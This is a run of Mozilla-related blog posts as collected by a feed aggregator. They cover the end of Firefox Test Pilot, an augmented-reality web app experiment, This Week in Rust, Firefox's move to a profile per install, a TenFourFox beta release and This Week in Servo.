Test Pilot was envisioned as a response to this problem: what if we could validate products before we expended the energy to ship them at Firefox’s rather significant scale? What if we could leverage our most ardent supporters, solicit their input, and iterate toward better products or simply kill things that didn’t really work?

And Test Pilot scratched that itch. We helped engender what Mozilla now describes as a culture of experiments. When I started at Mozilla, prototyping and lightweight validation techniques were mostly alien to the company, but now they’re commonplace. Conversations at Mozilla about possible futures are now framed in terms of how we might experiment or prototype or conduct user research to make smart product decisions.

This is not to suggest that Test Pilot was alone in bringing about this change. We were maybe in the vanguard, but our thinking definitely co-evolved with many other teams at Mozilla, and this cultural shift is one of the reasons Test Pilot’s time has come. The company at large has learned a ton about privacy-respecting research, prototyping and product experimentation, and we’re no longer dependent on one team to drive these practices. As 2019 progresses, expect to see more opportunity to experiment with and participate in the development of new products at Mozilla.

Shipping and Receiving

Over the last three or so years, the Test Pilot team has built — or facilitated — a number of popular Firefox features like Screenshots, Containers, Facebook Container, and Activity Stream. We’ve also made a raft of popular add-ons like Side View, Firefox Color, Snooze Tabs, Tab Centre (RIP), and Min Vid, and facilitated Mozilla’s first non-browser mobile products in Notes, Lockbox, and Send.

We were always meant to be a small prototyping team, and while we paired with other groups internally to build some experiments, we wound up amassing a stable of products that we could not reasonably ask other parts of the organization to maintain. With each successful experiment, we shed some of our prototyping capability in services of developing and maintaining scaled product experiences.

To wit, when Screenshots became an early success in Test Pilot, it took three engineers and a designer off of building experiments for Test Pilot and onto the full-time job of managing and growing Screenshots in Firefox. Eighteen months later, Screenshots is a product that is now used 20M times a month and demonstrably improves Firefox retention.

At first glance this kind of problem might seem obvious: just bring in more people. Maybe in a perfect world that’s possible, but people and teams aren’t infinitely fungible or replaceable. Hiring is hard, as is bringing people into in-flight projects. Relative to other browser vendors, Mozilla is a small company that punches well above its weight. We don’t have a massive surplus of engineers, designers and product managers lying around in storage. Over time, our team simply had to grapple with a growing stable of products.

It’s a similar story with Send, a product for which we are preparing a new release featuring an Android client, Firefox Accounts integration and much larger transfer limits. In order to invest in this product, we’re peeling off more resourcing from prototyping. Long story short, we’ve self-cannibalized by building stuff now deemed important to the organization writ large.

From Features to Services

The other trigger for this change is that our team have been moving away from developing new Firefox features and starting to invest in services that stand apart from the browser and bring Mozilla’s core philosophical commitments to privacy, security and user control to new audiences.

<figcaption>Updated design spec for the next version of Firefox Send (we’re getting rid of the Test Pilot link 🙂)</figcaption>

Firefox Send in particular represents a service that works totally independently of the Firefox browser (in fact more people use it on Chrome than on Firefox). While Firefox Lockbox is definitely a companion app to the Firefox password manager for now, it’s also 100% mobile and backed by Firefox Accounts and Sync.

Whereas Test Pilot was initially intended to test Firefox features, products like these started to expand our horizons. Quickly, teams outside of Test Pilot started pushing into this space. Firefox Monitor — a service that lets you see if your passwords have been involved in a data breach was a real hit for our company in 2018.

These types of projects represent a new set of opportunities to expand our brand. As they take up more and more of our time, maintaining a standalone platform for feature experimentation in the Firefox browser becomes more difficult to justify.

What’s Next

First thing’s first: if you are using any currently active add-on experiment, you can keep using it. Nothing’s gonna change in your browser, we’ll just automatically migrate you off of the Test Pilot versions of the add-ons.

Firefox Send and Firefox Lockbox will continue in active development in 2019 as standalone products. Notes, Firefox Color, Side View, Price Wise, and Email Tabs will all remain available at addons.mozilla.org for the foreseeable future. (ed note: I’ll add links to these new URLs here once I have them early next week). Email Tabs in particular may undergo some changes to make it more flexible and less directly connected to GMail, but otherwise these projects will be accessible in their current forms with occasional maintenance releases going forward. Speaking for myself, I hope to add some new palette generators and color properties like borders, sidebars, new tab &c. to Firefox Color, a particular favorite of mine.

As for the Test Pilot site and add-on, we are replacing the site with a farewell message on January 22nd. Visiting the site after this date will automatically uninstall the Test Pilot add-on, but you can also just uninstall it manually if you wish whenever you like without affecting installed experiments.

This blog will remain available indefinitely. Since many of the projects that started in Test Pilot are still actively being worked on, we’ll continue to post updates to projects here as events warrant.

A final, slightly personal, note

Test Pilot has been an absolutely phenomenal project to work on for nearly four years. The Mozilla community gave so much life to the project, and my teammates and I remain deeply grateful for your support, encouragement, and willingness to contribute.

To have had the opportunity to evangelize prototyping and rapid, iterative development processes at Mozilla has been the greatest pleasure of my professional life. Sharing the journey with the incredible women and men on the Test Pilot team made the experience singularly amazing. It’s been a great ride, and I’m so excited to see what comes next.

Ad astra


Adios, Amigo was originally published in Firefox Test Pilot on Medium, where people are continuing the conversation by highlighting and responding to this story.

Hacks.Mozilla.OrgAugmented Reality and the Browser — An App Experiment

We all want to build the next (or perhaps the first) great Augmented Reality app. But there be dragons! The space is new and not well defined. There aren’t any AR apps that people use every day to serve as starting points or examples. Your new ideas have to compete against an already very high quality bar of traditional 2d apps. And building a new app can be expensive, especially for native app environments. This makes AR apps still somewhat uncharted territory, requiring a higher initial investment of time, talent and treasure.

But this also creates a sense of opportunity; a chance to participate early before the space is fully saturated.

From our point of view the questions are: What kinds of tools do artists, developers, designers, entrepreneurs and creatives of all flavors need to be able to easily make augmented reality experiences? What kinds of apps can people build with tools we provide?

For example: Can I watch Trevor Noah on the Daily Show this evening, and then release an app tomorrow that is a riff on a joke he made the previous night? A measure of success is being able to speak in rich media quickly and easily, to be a timely part of a global conversation.

With Blair MacIntyre‘s help I wrote an experiment to play-test a variety of ideas exploring these questions. In this comprehensive post-mortem I’ll review the app we made, what we learned and where we’re going next.

Finding “good” use cases

To answer some of the above questions, we started out surveying AR and VR developers, asking them their thoughts and observations. We had some rules of thumb. What we looked for were AR use cases that people value, that are meaningful enough, useful enough, make enough of a difference, that they might possibly become a part of people’s lives.

Existing AR apps also provided inspiration. One simple AR app I like for example is AirMeasure, which is part of a family of similar apps such as the Augmented Reality Measuring Tape. I use it once or twice a month and while not often, it’s incredibly handy. It’s an app with real utility and has 6500 reviews on the App Store  – so there’s clearly some appetite already.

image of airmeasure, an augmented reality measuring tape

Sean White, Mozilla’s Chief R&D Officer, has a very specific definition for an MVP (minimum viable product). He asks: What would 100 people use every day?

When I hear this, I hear something like: What kind of experience is complete, compelling, and useful enough, that even in an earliest incarnation it captures a core essential quality that makes it actually useful for 100 real world people, with real world concerns, to use daily even with current limitations? Shipping can be hard, and finding those first users harder.

Browser-based AR

New Pixel phones, iPhones and other emerging devices such as the Magic Leap already support Augmented Reality. They report where the ground is, where walls are, and other kinds of environment sensing questions critical for AR. They support pass-through vision and 3d tracking and registration. Emerging standards, notably WebXR, will soon expose these powers to the browser in a standards- based way, much like the way other hardware features are built and made available in the browser.

Native app development toolchains are excellent but there is friction. It can be challenging to jump through the hoops required to release a product across several different app stores or platforms. Costs that are reasonable for a AAA title may not be reasonable for a smaller project. If you want to knock out an app tonight for a client tomorrow, or post an app as a response to an article in the press or a current event— it can take too long.

With AR support coming to the browser there’s an option now to focus on telling the story rather than worrying about the technology, costs and distribution. Browsers historically offer lower barriers to entry, and instant deployment to millions of users, unrestricted distribution and a sharing culture. Being able to distribute an app at the click of a link, with no install, lowers the activation costs and enables virality. This complements other development approaches, and can be used for rapid prototyping of ideas as well.

ARPersist – the idea

In our experiment we explored what it would be like to decorate the world with virtual post-it notes. These notes can be posted from within the app, and they stick around between play sessions. Players can in fact see each other, and can see each other moving the notes in real time. The notes are geographically pinned and persist forever.

Using our experiment, a company could decorate their office with hints about how the printers work, or show navigation breadcrumbs to route a bewildered new employee to a meeting. Alternatively, a vacationing couple could walk into an AirBNB, open an “ARBNB” app (pardon the pun) and view post-it notes illuminating where the extra blankets are or how to use the washer.

We had these kinds of aspirational use case goals for our experiment:

  • Office interior navigation: Imagine an office decorated with virtual hints and possibly also with navigation support. Often a visitor or corporate employee shows up in an unfamiliar place — such as a regional Mozilla office or a conference hotel or even a hospital – and they want to be able to navigate that space quickly. Meeting rooms are on different floors — often with quirky names that are unrelated to location.  A specific hospital bed with a convalescing friend or relative could be right next door or up three flights and across a walkway. I’m sure we’ve all struggled to find bathrooms, or the cafeteria, or that meeting room. And even when we’ve found what we want – how does it work, who is there, what is important? Take the simple example of a printer. How many of us have stood in front of a printer for too long trying to figure out how to make a single photocopy?
  • Interactive information for house guests: Being a guest in a person’s home can be a lovely experience. AirBNB does a great job of fostering trust between strangers. But is there a way to communicate all the small details of a new space? How to use the Nest sensor, how to use the fancy dishwasher? Where is the spatula? Where are extra blankets? An AirBNB or shared rental could be decorated with virtual hints. An owner walks around the space and posts up virtual post-it notes attached to some of the items, indicating how appliances work. A machine-assisted approach also is possible – where the owner walks the space with the camera active, opens every drawer and lets the machine learning algorithm label and memorize everything. Or, imagine a real-time variation where your phone tells you where the cat is, or where your keys are. There’s a collaborative possibility as well here, a shared journal, where guests could leave hints for each other — although this does open up some other concerns which are tricky to navigate – and hard to address.
  • Public retail and venue navigation: These ideas could also work in a shopping scenario to direct you to the shampoo, or in a scenario where you want to pinpoint friends in a sports coliseum or concert hall or other visually noisy venue.

ARPersist – the app

Taking these ideas we wrote a standalone app for the iPhone 6S or higher — which you can try at arpersist.glitch.me and play with the source code at https://github.com/anselm/arpersist>github.com/anselm/arpersist.

Here’s a short video of the app running, which you might have seen some days ago in my tweet:

And more detail on how to use the app if you want to try it yourself:

Here’s an image of looking at the space through the iPhone display:

An AR hornet in the living room as seen through the iphone

And an image of two players – each player can see the other player’s phone in 3d space and a heart placed on top of that in 3d:

You’ll need the WebXR Viewer for iOS, which you can get on the iTunes store. (WebXR standards are still maturing so this doesn’t yet run directly in most browsers.)

This work is open source, it’s intended to be re-used and intended to be played with, but also — because it works against non-standard browser extensions — it cannot be treated as something that somebody could build a commercial product with (yet).

The videos embedded above offer a good description: Basically, you open ARPersist, (using the WebXR viewer linked above on an iPhone 6s or higher), by going to the URL (arpersist.glitch.me). This drops you into a pass-through vision display. You’ll see a screen with four buttons on the right. The “seashell” button at the bottom takes you to a page where you can load and save maps. You’ll want to “create an anchor” and optionally “save your map”. At this point, from the main page, you can use the top icon to add new features to the world. Objects you place are going to stick to the nearest floor or wall. If you join somebody else’s map, or are at a nearby geographical location, you can see other players as well in real time.

This app features downloadable 3d models from Sketchfab. These are the assets I’m using:

  1. Flying Hornet by Ashley Aslett
  2. Low Poly Crow by fernandogilmiranda
  3. Love Low Poly by Suwulo

What went well

Coming out of that initial phase of development I’ve had many surprising realizations, and even a few eureka moments. Here’s what went well, which I describe as essential attributes of the AR experience:

  • Webbyness. Doing AR in a web app is very very satisfying. This is good news because (in my opinion) mobile web apps more typically reflects how developers will create content in the future. Of course there are questions still such as payment models and difficulty in encrypting or obfuscating art assets if those assets are valuable. For example a developer can buy a 3d model off the web and trivially incorporate that model into a web app but it’s not yet clear how to do this without violating licensing terms around re-distribution and how to compensate creators per use.
  • Hinting. This was a new insight. It turns out semantic hints are critical, both for intelligently decorating your virtual space with objects but also for filtering noise. By hints I mean being able to say that the intent of a virtual object is that it should be shown on the floor, or attached to a wall, or on top of the watercooler. There’s a difference between simply placing something in space and understanding why it belongs in that position. Also, what quickly turns up is an idea of priorities. Some virtual objects are just not as important as others. This can depend on the user’s context. There are different layers of filtering, but ultimately you have some collection of virtual objects you want to render, and those objects need to argue amongst themselves which should be shown where (or not at all) if they collide. The issue isn’t the contention resolution strategy — it’s that the objects themselves need to provide rich metadata so that any strategies can exist. I went as far as classifying some of the kinds of hints that would be useful. When you make a new object there are some toggle fields you can set to help with expressing your intention around placement and priority.
  • Server/Client models. In serving AR objects to the client a natural client server pattern emerges. This model begins to reflect a traditional RSS pattern — with many servers and many clients. There’s a chance here to try and avoid some of the risky concentrations of power and censorship that we see already with existing social networks. This is not a new problem, but an old problem that is made more urgent. AR is in your face — and preventing centralization feels more important.
  • Login/Signup. Traditional web apps have a central sign-in concept. They manage your identity for you, and you use a password to sign into their service. However, today it’s easy enough to push that back to the user.

    This gets a bit geeky — but the main principle is that if you use modern public key cryptography to self-sign your own documents, then a central service is not needed to validate your identity. Here I implemented a public/private keypair system similar to Metamask. The strategy is that the user provides a long phrase and then I use Ian Coleman’s Mnemonic Code Converter bip39 to turn that into a public/private keypair. (In this case, I am using bitcoin key-signing algorithms.)

    In my example implementation, a given keypair can be associated with a given collection of objects, and it helps prune a core responsibility away from any centralized social network. Users self-sign everything they create.

  • 6DoF control. It can be hard to write good controls for translating, rotating and scaling augmented reality objects through a phone. But towards the end of the build I realized that the phone itself is a 6dof controller. It can be a way to reach, grab, move and rotate — and vastly reduce the labor of building user interfaces. Ultimately I ended up throwing out a lot of complicated code for moving, scaling and rotating objects and replaced it simply with a single power, to drag and rotate objects using the phone itself. Stretching came for free — if you tap with two fingers instead of one finger then your finger distance is used as the stretch factor.
  • Multiplayer. It is pretty neat having multiple players in the same room in this app. Each of the participants can manipulate shared objects, and each participant can be seen as a floating heart in the room — right on top of where their phone is in the real world. It’s quite satisfying. There wasn’t a lot of shared compositional editing (because the app is so simple) but if the apps were more powerful this could be quite compelling.

Challenges that remain

We also identified many challenges. Here are some of the ones we faced:

  • Hardware. There’s a fairly strong signal that Magic Leap or Hololens will be better platforms for this experience. Phones just are not a very satisfying way to manipulate objects in Augmented Reality. A logical next step for this work is to port it to the Magic Leap or the Hololens or both or other similar emerging hardware.
  • Relocalization. One serious, almost blocker problem had to do with poor relocalization. Between successive runs I couldn’t reestablish where the phone was. Relocalization, my device’s ability to accurately learn its position and orientation in real world space, was unpredictable. Sometimes it would work many times in a row when I would run the app. Sometimes I couldn’t establish relocalization once in an entire day. It appears that optimal relocalization is demanding, and requires very bright sunlight, stable lighting conditions and jumbled sharp edge geometry. Relocalization on passive optics is too hard and it disrupts the feeling of continuity — being able to quit the app and restart it, or enabling multiple people to share the same experience from their own devices. I played with a work-around, which was to let users manually relocalize — but I think this still needs more exploration.

    This is ultimately a hardware problem. Apple/Google have done an unbelievable job with pure software but the hardware is not designed for the job. Probably the best short-term answer is to use a QRCode. A longer term answer is to just wait a year for better hardware. Apparently next-gen iPhones will have active depth sensors and this may be an entirely solved problem in a year or two. (The challenge is that we want to play with the future before it arrives — so we do need some kind of temporary solution for now.)

  • Griefing. Although my test audience was too small to have any griefers — it was pretty self-evident that any canonical layer of reality would instantly be filled with graphical images that could be offensive or not safe for work (NSFW). We have to find a way to allow for curation of layers. Spam and griefing are important to prevent but we don’t want to censor self-expression. The answer here was to not have any single virtual space but to let people self select who they follow. I could see roles emerging for making it easy to curate and distribute leadership roles for curation of shared virtual spaces — similar to Wikipedia.
  • Empty spaces. AR is a lonely world when there is nobody else around. Without other people nearby it’s just not a lot of fun to decorate space with virtual objects at all. So much of this feels social. A thought here is that it may be better, and possible, to create portals that wire together multiple AR spaces — even if those spaces are not actually in the same place — in order to bring people together to have a shared consensus. This begins to sound more like VR in some ways but could be a hybrid of AR and VR together. You could be at your house, and your friend at their house, and you could join your rooms together virtually, and then see each others post-it notes or public virtual objects in each others spaces (attached to the nearest walls or floors as based on the hints associated with those objects).
  • Security/Privacy. Entire posts could be written on this topic alone. The key issue is that sharing a map to a server, that somebody else can then download, means leaking private details of your own home or space to other parties. Some of this simply means notifying the user intelligently — but this is still an open question and deserves thought.
  • Media Proxy. We’re fairly used to being able to cut and paste links into slack or into other kinds of forums, but the equivalent doesn’t quite yet exist in VR/AR, although the media sharing feature in Hubs, Mozilla’s virtual reality chat system and social environment, is a first step. It would be handy to paste not only 3d models but also PDFs, videos and the like. There is a highly competitive anti-sharing war going on between rich media content providers and entities that want to allow and empower sharing of content. Take the example of iframely, a service that aims to simplify and optimize rich media sharing between platforms and devices.

Next steps

Here’s where I feel this work will go next:

  • Packaging. Although the app works “technically” it isn’t that user friendly. There are many UI assumptions. When capturing a space one has to let the device capture enough data before saving a map. There’s no real interface for deleting old maps. The debugging screen, which provides hints about the system state, is fairly incomprehensible to a novice. Basically the whole acquisition and tracking phase should “just work” and right now it requires a fair level of expertise. The right way to exercise a more cohesive “package” is to push this experience forward as an actual app for a specific use case. The AirBNB decoration use case seems like the right one.
  • HMD (Head-mounted display) support. Magic Leap or Hololens or possibly even Northstar support. The right place for this experience is in real AR glasses. This is now doable and it’s worth doing. Granted every developer will also be writing the same app, but this will be from a browser perspective, and there is value in a browser-based persistence solution.
  • Embellishments. There are several small features that would be quick easy wins. It would be nice to show contrails of where people moved through space for example. As well it would be nice to let people type in or input their own text into post-it notes (right now you can place gltf objects off the net or images). And it would be nice to have richer proxy support for other media types as mentioned. I’d like to clarify some licensing issues for content as well in this case. Improving manual relocalization (or using a QRCode) could help as well.
  • Navigation. I didn’t do the in-app route-finding and navigation; it’s one more piece that could help tell the story. I felt it wasn’t as critical as basic placement — but it helps argue the use cases.
  • Filtering. We had aspirations around social networking — filtering by peers that we just didn’t get to test out. This would be important in the future.

Several architecture observations

This research wasn’t just focused on user experience but also explored internal architecture. As a general rule I believe that the architecture behind an MVP should reflect a mature partitioning of jobs that the fully-blown app will deliver. In nascent form, the MVP has to architecturally reflect a larger code base. The current implementation of this app consists of these parts (which I think reflect important parts of a more mature system):

  • Cloud Content Server. A server must exist which hosts arbitrary data objects from arbitrary participants. We needed some kind of hosting that people can publish content to. In a more mature universe there could be many servers. Servers could just be WordPress, and content could just be GeoRSS. Right now however I have a single server — but at the same time that server doesn’t have much responsibility. It is just a shared database. There is a third party ARCloud initiative which speaks to this as well.
  • Content Filter. Filtering content is an absurdly critical MVP requirement. We must be able to show that users can control what they see. I imagine this filter as a perfect agent, a kind of copy of yourself that has the time to carefully inspect every single data object and ponder if it is worth sharing with you or not. The content filter is a proxy for you, your will. It has perfect serendipity, perfect understanding and perfect knowledge of all things. The reality of course falls short of this — but that’s my mental model of the job here. The filter can exist on device or in the cloud.
  • Renderer. The client-side rendering layer deals with painting stuff on your field of view. It deals with contention resolution between objects competing for your attention. It handles presentation semantics — that some objects want to be shown in certain places  —  as well as ideas around fundamental UX paradigms for how people will interact with AR. Basically it invents an AR desktop  — a fundamental AR interface  — for mediating human interaction. Again of course, we can’t do all this, but that’s my mental model of the job here.
  • Identity Management. This is unsolved for the net at large and is destroying communication on the net. It’s arguably one of the most serious problems in the world today because if we can’t communicate, and know that other parties are real, then we don’t have a civilization. It is a critical problem for AR as well because you cannot have spam and garbage content in your face. The approach I mentioned above is to have users self-sign their utterances. On top of this would be conventional services to build up follow lists of people (or what I call emitters) and then arbitration between those emitters using a strategy to score emitters based on the quality of what they say, somewhat like a weighted contextual network graph.

An architectural observation regarding geolocation of all objects

One other technical point deserves a bit more elaboration. Before we started we had to answer the question of “how do we represent or store the location of virtual objects?”. Perhaps this isn’t a great conversation starter at the pub on a Saturday night, but it’s important nevertheless.

We take so many things for granted in the real world – signs, streetlights, buildings. We expect them to stick around even when you look away. But programming is like universe building, you have to do everything by hand.

The approach we took may seem obvious: to define object position with GPS coordinates. We give every object a latitude, longitude and elevation (as well as orientation).

But the gotcha is that phones today don’t have precise geolocation. We had to write a wrapper of our own. When users start our app we build up (or load) an augmented reality map of the area. That map can be saved back to a server with a precise geolocation. Once there is a map of a room, then everything in that map is also very precisely geo-located. This means everything you place or do in our app is in fact specified in earth global coordinates.

Blair points out that although modern smartphones (or devices) today don’t have very accurate GPS, this is likely to change soon. We expect that in the next year or two GPS will become hyper-precise – augmented by 3d depth maps of the landscape – making our wrapper optional.

Conclusions

Our exploration has been taking place in conversation and code. Personally I enjoy this praxis — spending some time talking, and then implementing a working proof of concept. Nothing clarifies thinking like actually trying to build an example.

At the 10,000 foot view, at the idealistic end of the spectrum, it is becoming obvious that we all have different ideas of what AR is or will be. The AR view I crave is one of many different information objects from many of different providers — personal reminders, city traffic overlays, weather bots, friend location notifiers, contrails of my previous trajectories through space etc. It feels like a creative medium. I see users wanting to author objects, where different objects have different priorities, where different objects are “alive” — that they have their own will, mobility and their own interactions with each other. In this way an AR view echoes a natural view of the default world— with all kinds of entities competing for our attention.

Stepping back even further — at a 100,000 foot view —  there are several fundamental communication patterns that humans use creatively. We use visual media (signage) and we use audio (speaking, voice chat). We have high-resolution high-fidelity expressive capabilities, that includes our body language, our hand gestures, and especially a hugely rich facial expressiveness. We also have text-based media — and many other kinds of media. It feels like when anybody builds a communication medium that easily allows humans to channel some of their high-bandwidth needs over that pipeline, that medium can become very popular. Skype, messaging, wikis, even music — all of these things meet fundamental expressive human drives; they are channels for output and expressiveness.

In that light a question that’s emerging for me is “Is sharing 3D objects in space a fundamental communication medium?”. If so then the question becomes more “What are reasons to NOT build a minimal capability to express the persistent 3d placement of objects in space?”. Clearly work needs to make money and be sustainable for people who make the work. Are we tapping into something fundamental enough, valuable enough, even in early incarnations, that people will spend money (or energy) on it? I posit that if we help express fundamental human communication  patterns — we all succeed.

What’s surprising is the power of persistence. When the experience works well I have the mental illusion that my room indeed has these virtual images and objects in it. Our minds seem deeply fooled by the illusion of persistence. Similar to using the Magic Leap there’s a sense of “magic” — the sense that there’s another world — that you can see if you squint just right. Even after you put down the device that feeling lingers. Augmented Reality is starting to feel real.

The post Augmented Reality and the Browser — An App Experiment appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogEvolving Firefox’s Culture of Experimentation: A Thank You from the Test Pilot Program

For the last three years Firefox has invested heavily in innovation, and our users have been an essential part of this journey. Through the Test Pilot Program, Firefox users have been able to help us test and evaluate a variety of potential Firefox features. Building on the success of this program, we’re proud to announce today that we’re evolving our approach to experimentation even further.

Lessons Learned from Test Pilot

Test Pilot was designed to harness the energy of our most passionate users. We gave them early prototypes and product explorations that weren’t ready for wide release. In return, they gave us feedback and patience as these projects evolved into the highly polished features within our products today. Through this program we have been able to iterate quickly, try daring new things, and build products that our users have been excited to embrace.

Graduated Features

Since the beginning of the Test Pilot program, we’ve built or helped build a number of popular Firefox features. Activity Stream, which now features prominently on the Firefox homepage, was in the first round of Test Pilot experiments. Activity Stream brought new life to an otherwise barren page and made it easier to recall and discover new content on the web. The Test Pilot team continued to draw the attention of the press and users alike with experiments like Containers that paved the way for our highly successful Facebook Container. Send made private, encrypted, file sharing as easy as clicking a button. Lockbox helped you take your Firefox passwords to iOS devices (and soon to Android). Page Shot started as a simple way to capture and share screenshots in Firefox. We shipped the feature now known as Screenshots and have since added our new approach to anti-tracking that first gained traction as a Test Pilot experiment.

So what’s next?

Test Pilot performed better than we could have ever imagined. As a result of this program we’re now in a stronger position where we are using the knowledge that we gained from small groups, evangelizing the benefits of rapid iteration, taking bold (but safe) risks, and putting the user front and center.

We’re applying these valuable lessons not only to continued product innovation, but also to how we test and ideate across the Firefox organization. So today, we are announcing that we will be moving to a new structure that will demonstrate our ability to innovate in exciting ways and as a result we are closing the Test Pilot program as we’ve known it.

More user input, more testing

Migrating to a new model doesn’t mean we’re doing fewer experiments. In fact, we’ll be doing even more! The innovation processes that led to products like Firefox Monitor are no longer the responsibility of a handful of individuals but rather the entire organization. Everyone is responsible for maintaining the Culture of Experimentation Firefox has developed through this process. These techniques and tools have become a part of our very DNA and identity. That is something to celebrate. As such, we won’t be uninstalling any experiments you’re using today, in fact, many of the Test Pilot experiments and features will find their way to Addons.Mozilla.Org, while others like Send and Lockbox will continue to take in more input from you as they evolve into stand alone products.

We couldn’t do it without you

We want to thank Firefox users for their input and support of product features and functionality testing through the Test Pilot Program. We look forward to continuing to work closely with our users who are the reason we build Firefox in the first place. In the coming months look out for news on how you can get involved in the next stage of our experimentation.

In the meantime, the Firefox team will continue to focus on the next release and what we’ll be developing in the coming year, while other Mozillians chug away at developing equally exciting and user-centric product solutions and services. You can get a sneak peak at some of these innovations at Mozilla Labs, which touches everything from voice capability to IoT to AR/VR.

And so we say goodbye and thank you to Test Pilot for helping us usher in a bright future of innovation at Mozilla.

The post Evolving Firefox’s Culture of Experimentation: A Thank You from the Test Pilot Program appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 269

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

News & Blog Posts

#Rust2019

Find all #Rust2019 posts at Read Rust.

Crate of the Week

This week's crate is ropey, an editable text buffer data structure. Thanks to Vikrant Chaudhary for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

189 pull requests were merged in the last week

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs

New RFCs

Upcoming Events

Online
Asia
Europe
North America
South America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Right. I've never even used this impl, but my first thought upon seeing the question "I have an Iterator of X and need a Y" was to look at the FromIterator impls of Y.

If that impl didn't exist, I'd then look for the following:

  • Other FromIterator<X> impls for String to see if any of those X can easily be produced from char (and then I would call map before .collect()).
  • impl FromIterator<char> for Vec<u8>. If this existed I would use String::from_utf8(iterator.collect()).
  • impl Add<char> for String. If this existed, I would use .fold(String::new(), |s, c| s + c)
  • methods of char to see if there's anything that lets you obtain the UTF8 bytes. Indeed, there is encode_utf8, which even gives a &mut str, so one can write rust .fold(String::new(), |s, c| { let mut buffer = [u8; 4]; s += &*c.encode_utf8(&mut buffer); s })
  • idly check the inherent methods of String for whatever pops out at me

and if I could still find nothing after all of that I'd slam my head into a wall somewhere.

– Michael Lamparski on rust-users

Thanks to Cauê Baasch De Souza for the suggestion!

Please submit your quotes for next week!

This Week in Rust is edited by: nasa42, llogiq, and Flavsditz.

Discuss on r/rust.

Firefox NightlyMoving to a Profile per Install Architecture

With Firefox 67 you’ll be able to run different Firefox installs side by side by default.

Supporting profiles per installation is a feature that has been requested by pre-release users for a long time now and we’re pleased to announce that starting with Firefox 67 users will be able to run different installs of Firefox side by side without needing to manage profiles.

What are profiles?

Firefox saves information such as bookmarks, passwords and user preferences in a set of files called your profile. This profile is stored in a location separate from the Firefox program files.

More details on profiles are can be found here.

What changes are we making to profiles in Firefox 67?

Previously, all Firefox versions shared a single profile by default. With Firefox 67, Firefox will begin using a dedicated profile for each Firefox version (including Nightly, Beta, Developer Edition, and ESR). This will make Firefox more stable when switching between versions on the same computer and will also allow you to run different Firefox installations at the same time:

  • You have not lost any personal data or customizations. Any previous profile data is saved and associated with the first Firefox installation that was opened after this change.
  • Starting with Firefox 67, Firefox installations will now have separate profiles. This will apply to Nightly 67 initially and then to all versions of release 67 and above as the  change makes it way to Developer Edition, Beta, Firefox, and ESR.

What are my options?

If you do nothing, your profile data will be different on each version of Firefox.

If you would like the information you save to Firefox to be the same on all versions, you can use a Firefox Account to keep them in sync.

Sync is the easiest way to make your profiles consistent on all of your versions of Firefox. You also get additional benefits like sending tabs and secure password storage. Get started with Sync here.

You will not lose any personal data or customizations. Any previous profile data is safe and attached to the first Firefox installation that was opened after this change.

Users of only one Firefox install or users of multiple Firefox installs who already had set different profiles for different installations will not notice the change

We really hope that this change will make it simpler for Firefox users to start running Nightly. If you come across a bug or have any suggestions we really welcome your input through our support channels.

What if I already use separate profiles for my different Firefox installations?

Users who already have created manually separate profile for different installations will not notice the change (this has been the advised procedure on Nightly for a while).

Cameron KaiserTenFourFox FPR12b1 available

TenFourFox Feature Parity 12 beta 1 is now available (downloads, hashes, release notes). As before, this is a smaller-scope release with no new features, just fixes and improvements. The big changes are a fix for CVE-2018-12404, a holdover security fix from FPR11 that also helps improve JavaScript optimization, and Raphael's hand-coded assembly language AltiVec-accelerated string matching routines with special enhancements for G5 systems. These replace the C routines I wrote using AltiVec intrinsics, which will be removed from our hacked NSPR libc source code once his versions stick.

Unfortunately, we continue to accumulate difficult-to-solve JavaScript bugs. The newest one is issue 541, which affects Github most severely and is hampering my ability to use the G5 to work in the interface. This one could be temporarily repaired with some ugly hacks and I'm planning to look into that for FPR13, but I don't have this proposed fix in FPR12 since it could cause parser regressions and more testing is definitely required. However, the definitive fix is the same one needed for the frustrating issue 533, i.e., the new frontend bindings introduced with Firefox 51. I don't know if I can do that backport (both with respect to the technical issues and the sheer amount of time required) but it's increasingly looking like it's necessary for full functionality and it may be more than I can personally manage.

Meanwhile, FPR12 is scheduled for parallel release with Firefox 60.5/65 on January 29. Report new issues in the comments (as always, please verify the issue doesn't also occur in FPR11 before reporting a new regression, since sites change more than our core does).

The Servo BlogThis Week In Servo 123

In the past three weeks, we merged 72 PRs in the Servo organization’s repositories.

Congratulations to dlrobertson for their new reviewer status for the ipc-channel library!

Planning and Status

Our roadmap is available online. Plans for 2019 will be published soon.

This week’s status updates are here.

Exciting works in progress

Notable Additions

  • nox improved the web compatibility of the MIME type parser.
  • Manishearth removed some blocking behaviour from the WebXR implementation.
  • Collares implemented the ChannelSplitterNode WebAudio API.
  • makepost added musl support to the ipc-channel crate.
  • aditj implemented several missing APIs for the resource timing standard.
  • dlrobertson exposed the HTMLTrackElement API.
  • ferjm added support for backoff to the media playback implementation.
  • jdm implemented the missing source API for message events.
  • ferjm improved the compatibility of the media playback DOM integration.
  • germangc implemented missing DOM APIs for looping and terminating media playback.

New Contributors

Interested in helping build a web browser? Take a look at our curated list of issues that are good for new contributors!

Hacks.Mozilla.OrgDesigning the Flexbox Inspector

Screenshot showing the Flex highlighter, Flex Container pane, and Flex Item pane

Firefox DevEdition logoThe new Flexbox Inspector, created by Firefox DevTools, helps developers understand the sizing, positioning, and nesting of Flexbox elements. You can try it out now in Firefox DevEdition or join us for its official launch in Firefox 65 on January 29th.

